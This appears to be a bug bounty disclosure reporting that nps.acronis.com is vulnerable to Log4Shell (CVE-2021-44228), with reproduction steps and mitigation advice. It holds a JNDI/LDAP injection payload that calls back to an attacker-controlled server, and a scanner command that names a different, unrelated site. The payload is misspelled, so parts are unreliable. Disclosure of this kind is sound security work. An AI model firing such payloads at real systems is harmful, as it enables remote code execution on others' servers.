[CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day

## Summary The website at nps.acronis.com is vulnerable to CVE-2021-44228 ## Steps To Reproduce I used this [script](https://github.com/fullhunt/log4j-scan) to find this. It spins up an interact-sh server to receive the callback and send the payload in the query string and about 30 diffent headers. You can reproduce manually with curl and interact-sh/burp collaborator/a server you control. However, since the callback is proof of the vulnerability, the script makes it easier to identify. Let me know if you want me to tell you which specific header fires the payload and I will test them. 1. Construct the payload: `${jdni:ldap://nps.acronis.com.<your-server>/test}` 1. Inject the payload in the Request Headers (User Agent, X-Forwarded-For etc) or use the script from fullscan: `python3 log4j-scan.py -u 'https://marketingportal.engelvoelkers.com'` 1. Observe the callback, proving the deserialization of untrusted data which leads to rce {F1544482} ## Recommendations Update log4j to the latest [version](https://logging.apache.org/log4j/2.x/download.html) If updating to the latest version is not possible the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions >=2.10 by setting the system property log4j2.formatMsgNoLookups or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true. ## Impact Remote Code Execution (rce)